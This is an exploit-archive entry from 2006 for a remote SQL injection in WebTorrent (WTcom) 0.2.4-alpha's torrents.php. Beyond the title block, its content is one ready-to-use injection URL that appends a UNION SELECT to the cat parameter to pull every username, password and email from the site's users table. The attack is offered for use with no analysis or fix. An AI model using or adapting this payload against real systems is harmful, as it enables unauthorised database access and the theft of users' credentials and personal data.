WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability
# Published : 2006-08-17
# Author : sh1r081
# Previous Title : IRSR <= 0.2 (_sysSessionPath) Remote File Include Vulnerability
# Next Title : POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability

# WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

# www.Syue.com [2006-08-17]